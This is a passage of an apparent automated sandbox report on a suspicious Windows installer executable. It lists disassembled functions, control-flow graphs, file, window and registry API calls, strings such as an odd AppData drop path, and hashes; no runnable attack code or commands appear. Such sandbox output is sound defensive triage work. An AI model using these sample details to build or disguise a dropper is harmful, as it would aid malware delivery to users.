                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                    • String ID: {
                                                                    • API String ID: 590372296-366298937
                                                                    • Opcode ID: 113d712a5db4ed50a1b1b5b673bec4020998c06132e16f1965ea7ae8cf20c9d1
                                                                    • Instruction ID: e2c232b37aba284685acfefcf9c5e68312cc9a4ea8bcb72f9f75ba3fcde89da4
                                                                    • Opcode Fuzzy Hash: 113d712a5db4ed50a1b1b5b673bec4020998c06132e16f1965ea7ae8cf20c9d1
                                                                    • Instruction Fuzzy Hash: 0EB15871900608FFDB119FA0DD89EAE7B79FB48354F00812AFA44BA1A0CB795E51DF58
                                                                    Function 004059A9 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 499 4059a9-4059cf call 405c74 502 4059d1-4059e3 DeleteFileW 499->502 503 4059e8-4059ef 499->503 504 405b65-405b69 502->504 505 4059f1-4059f3 503->505 506 405a02-405a12 call 406297 503->506 507 405b13-405b18 505->507 508 4059f9-4059fc 505->508 512 405a21-405a22 call 405bb8 506->512 513 405a14-405a1f lstrcatW 506->513 507->504 511 405b1a-405b1d 507->511 508->506 508->507 514 405b27-405b2f call 4065da 511->514 515 405b1f-405b25 511->515 517 405a27-405a2b 512->517 513->517 514->504 523 405b31-405b45 call 405b6c call 405961 514->523 515->504 520 405a37-405a3d lstrcatW 517->520 521 405a2d-405a35 517->521 522 405a42-405a5e lstrlenW FindFirstFileW 520->522 521->520 521->522 524 405a64-405a6c 522->524 525 405b08-405b0c 522->525 539 405b47-405b4a 523->539 540 405b5d-405b60 call 4052ff 523->540 527 405a8c-405aa0 call 406297 524->527 528 405a6e-405a76 524->528 525->507 530 405b0e 525->530 541 405aa2-405aaa 527->541 542 405ab7-405ac2 call 405961 527->542 531 405a78-405a80 528->531 532 405aeb-405afb FindNextFileW 528->532 530->507 531->527 535 405a82-405a8a 531->535 532->524 538 405b01-405b02 FindClose 532->538 535->527 535->532 538->525 539->515 543 405b4c-405b5b call 4052ff call 40605d 539->543 540->504 541->532 544 405aac-405ab5 call 4059a9 541->544 552 405ae3-405ae6 call 4052ff 542->552 553 405ac4-405ac7 542->553 543->504 544->532 552->532 554 405ac9-405ad9 call 4052ff call 40605d 553->554 555 405adb-405ae1 553->555 554->532 555->532
                                                                    APIs
                                                                    • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 004059D2
                                                                    • lstrcatW.KERNEL32(007A3F28,\*.*,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405A1A
                                                                    • lstrcatW.KERNEL32(?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405A3D
                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405A43
                                                                    • FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405A53
                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AF3
                                                                    • FindClose.KERNEL32(00000000), ref: 00405B02
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                    • String ID: "C:\Users\user\Desktop\Xjz8dblHDe.exe"$(?z$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                    • API String ID: 2035342205-2525425551
                                                                    • Opcode ID: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
                                                                    • Instruction ID: 8b5db7531a0f4bb83586dba503ceccc8cbbd7972abfd892cd346515476ce1415
                                                                    • Opcode Fuzzy Hash: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
                                                                    • Instruction Fuzzy Hash: 7D41D830900918A6CF21AB65CC89ABF7678EF82718F14827FF801B11C1D77C5985DE6E
                                                                    Function 004065DA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 725 4065da-4065ee FindFirstFileW 726 4065f0-4065f9 FindClose 725->726 727 4065fb 725->727 728 4065fd-4065fe 726->728 727->728
                                                                    APIs
                                                                    • FindFirstFileW.KERNELBASE(?,007A4F70,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,00405CBD,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,00000000,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420), ref: 004065E5
                                                                    • FindClose.KERNEL32(00000000), ref: 004065F1
                                                                    Strings
                                                                    • pOz, xrefs: 004065DB
                                                                    • C:\Users\user\AppData\Local\Temp\nslC41E.tmp, xrefs: 004065DA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nslC41E.tmp$pOz
                                                                    • API String ID: 2295610775-1155576360
                                                                    • Opcode ID: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                    • Instruction ID: b37c022bec08382a0cb03c9db181d2efdea8b1f21deeb05207148622359d6313
                                                                    • Opcode Fuzzy Hash: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                    • Instruction Fuzzy Hash: EFD01231519020AFC2001B38BD0C84B7A589F463307158B3AB4A6F11E4CB788C6296A9
                                                                    Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402877
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindFirst
                                                                    • String ID:
                                                                    • API String ID: 1974802433-0
                                                                    • Opcode ID: 130c54d92b0f6b632a850d8ad33ab5dd3edf8e18272f0a02b3194b9783d02949
                                                                    • Instruction ID: f65ff15fdb1f10fb5373ba158cef8787300933468326e23b7288bb8c2237705b
                                                                    • Opcode Fuzzy Hash: 130c54d92b0f6b632a850d8ad33ab5dd3edf8e18272f0a02b3194b9783d02949
                                                                    • Instruction Fuzzy Hash: 87F0E271A10000ABCB00EFA0D9099ADB378EF04314F20417BF401F21D0DBB85D409B2A
                                                                    Function 00403D35 Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 190 403d35-403d47 191 403e88-403e97 190->191 192 403d4d-403d53 190->192 194 403ee6-403efb 191->194 195 403e99-403ee1 GetDlgItem * 2 call 40420e SetClassLongW call 40140b 191->195 192->191 193 403d59-403d62 192->193 196 403d64-403d71 SetWindowPos 193->196 197 403d77-403d7a 193->197 199 403f3b-403f40 call 40425a 194->199 200 403efd-403f00 194->200 195->194 196->197 202 403d94-403d9a 197->202 203 403d7c-403d8e ShowWindow 197->203 209 403f45-403f60 199->209 205 403f02-403f0d call 401389 200->205 206 403f33-403f35 200->206 210 403db6-403db9 202->210 211 403d9c-403db1 DestroyWindow 202->211 203->202 205->206 221 403f0f-403f2e SendMessageW 205->221 206->199 208 4041db 206->208 216 4041dd-4041e4 208->216 214 403f62-403f64 call 40140b 209->214 215 403f69-403f6f 209->215 219 403dbb-403dc7 SetWindowLongW 210->219 220 403dcc-403dd2 210->220 217 4041b8-4041be 211->217 214->215 224 403f75-403f80 215->224 225 404199-4041b2 DestroyWindow EndDialog 215->225 217->208 223 4041c0-4041c6 217->223 219->216 226 403e75-403e83 call 404275 220->226 227 403dd8-403de9 GetDlgItem 220->227 221->216 223->208 231 4041c8-4041d1 ShowWindow 223->231 224->225 232 403f86-403fd3 call 4062b9 call 40420e * 3 GetDlgItem 224->232 225->217 226->216 228 403e08-403e0b 227->228 229 403deb-403e02 SendMessageW IsWindowEnabled 227->229 233 403e10-403e13 228->233 234 403e0d-403e0e 228->234 229->208 229->228 231->208 260 403fd5-403fda 232->260 261 403fdd-404019 ShowWindow KiUserCallbackDispatcher call 404230 EnableWindow 232->261 238 403e21-403e26 233->238 239 403e15-403e1b 233->239 237 403e3e-403e43 call 4041e7 234->237 237->226 241 403e5c-403e6f SendMessageW 238->241 243 403e28-403e2e 238->243 239->241 242 403e1d-403e1f 239->242 241->226 242->237 246 403e30-403e36 call 40140b 243->246 247 403e45-403e4e call 40140b 243->247 258 403e3c 246->258 247->226 256 403e50-403e5a 247->256 256->258 258->237 260->261 264 40401b-40401c 261->264 265 40401e 261->265 266 404020-40404e GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404050-404061 SendMessageW 266->267 268 404063 266->268 269 404069-4040a8 call 404243 call 403d16 call 406297 lstrlenW call 4062b9 SetWindowTextW call 401389 267->269 268->269 269->209 280 4040ae-4040b0 269->280 280->209 281 4040b6-4040ba 280->281 282 4040d9-4040ed DestroyWindow 281->282 283 4040bc-4040c2 281->283 282->217 285 4040f3-404120 CreateDialogParamW 282->285 283->208 284 4040c8-4040ce 283->284 284->209 286 4040d4 284->286 285->217 287 404126-40417d call 40420e GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->208 287->208 292 40417f-404192 ShowWindow call 40425a 287->292 294 404197 292->294 294->217
                                                                    APIs
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D71
                                                                    • ShowWindow.USER32(?), ref: 00403D8E
                                                                    • DestroyWindow.USER32 ref: 00403DA2
                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DBE
                                                                    • GetDlgItem.USER32(?,?), ref: 00403DDF
                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DF3
                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403DFA
                                                                    • GetDlgItem.USER32(?,00000001), ref: 00403EA8
                                                                    • GetDlgItem.USER32(?,00000002), ref: 00403EB2
                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00403ECC
                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F1D
                                                                    • GetDlgItem.USER32(?,00000003), ref: 00403FC3
                                                                    • ShowWindow.USER32(00000000,?), ref: 00403FE4
                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FF6
                                                                    • EnableWindow.USER32(?,?), ref: 00404011
                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404027
                                                                    • EnableMenuItem.USER32(00000000), ref: 0040402E
                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404046
                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404059
                                                                    • lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404083
                                                                    • SetWindowTextW.USER32(?,007A1F20), ref: 00404097
                                                                    • ShowWindow.USER32(?,0000000A), ref: 004041CB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                    • String ID:
                                                                    • API String ID: 3282139019-0
                                                                    • Opcode ID: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
                                                                    • Instruction ID: db2580999c41c4fe450d1ee4fd1a55221d51bf0aef153e7307bc2b2ec56299a6
                                                                    • Opcode Fuzzy Hash: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
                                                                    • Instruction Fuzzy Hash: 3FC1DEB2504200AFDB206F61ED48E2B3AA8EB9A745F01453FF651B11F0CB399991DB5E
                                                                    Function 00403987 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 295 403987-40399f call 406671 298 4039a1-4039b1 call 4061de 295->298 299 4039b3-4039ea call 406165 295->299 308 403a0d-403a36 call 403c5d call 405c74 298->308 304 403a02-403a08 lstrcatW 299->304 305 4039ec-4039fd call 406165 299->305 304->308 305->304 313 403ac8-403ad0 call 405c74 308->313 314 403a3c-403a41 308->314 320 403ad2-403ad9 call 4062b9 313->320 321 403ade-403b03 LoadImageW 313->321 314->313 316 403a47-403a61 call 406165 314->316 319 403a66-403a6f 316->319 319->313 322 403a71-403a75 319->322 320->321 324 403b84-403b8c call 40140b 321->324 325 403b05-403b35 RegisterClassW 321->325 326 403a87-403a93 lstrlenW 322->326 327 403a77-403a84 call 405b99 322->327 338 403b96-403ba1 call 403c5d 324->338 339 403b8e-403b91 324->339 328 403c53 325->328 329 403b3b-403b7f SystemParametersInfoW CreateWindowExW 325->329 333 403a95-403aa3 lstrcmpiW 326->333 334 403abb-403ac3 call 405b6c call 406297 326->334 327->326 332 403c55-403c5c 328->332 329->324 333->334 337 403aa5-403aaf GetFileAttributesW 333->337 334->313 341 403ab1-403ab3 337->341 342 403ab5-403ab6 call 405bb8 337->342 348 403ba7-403bc1 ShowWindow call 406601 338->348 349 403c2a-403c2b call 4053d2 338->349 339->332 341->334 341->342 342->334 354 403bc3-403bc8 call 406601 348->354 355 403bcd-403bdf GetClassInfoW 348->355 353 403c30-403c32 349->353 356 403c34-403c3a 353->356 357 403c4c-403c4e call 40140b 353->357 354->355 360 403be1-403bf1 GetClassInfoW RegisterClassW 355->360 361 403bf7-403c1a DialogBoxParamW call 40140b 355->361 356->339 362 403c40-403c47 call 40140b 356->362 357->328 360->361 366 403c1f-403c28 call 4038d7 361->366 362->339 366->332
                                                                    APIs
                                                                      • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                      • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                    • lstrcatW.KERNEL32(1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75923420,"C:\Users\user\Desktop\Xjz8dblHDe.exe",00000000), ref: 00403A08
                                                                    • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A88
                                                                    • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A9B
                                                                    • GetFileAttributesW.KERNEL32(: Completed), ref: 00403AA6
                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen), ref: 00403AEF
                                                                      • Part of subcall function 004061DE: wsprintfW.USER32 ref: 004061EB
                                                                    • RegisterClassW.USER32(007A79C0), ref: 00403B2C
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B44
                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B79
                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403BAF
                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BDB
                                                                    • GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BE8
                                                                    • RegisterClassW.USER32(007A79C0), ref: 00403BF1
                                                                    • DialogBoxParamW.USER32(?,00000000,00403D35,00000000), ref: 00403C10
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: "C:\Users\user\Desktop\Xjz8dblHDe.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                    • API String ID: 1975747703-2514653945
                                                                    • Opcode ID: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
                                                                    • Instruction ID: fbef4646fbcf09e2f3785bbd11e1a9055ea34cd93d2d0ed92f9d0f486109358d
                                                                    • Opcode Fuzzy Hash: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
                                                                    • Instruction Fuzzy Hash: 4D61B434200700AED320AF669D45F2B3A6CEB86745F40857FF941B51E2DB7D6901CB2D
                                                                    Function 00402EDD Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 182COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
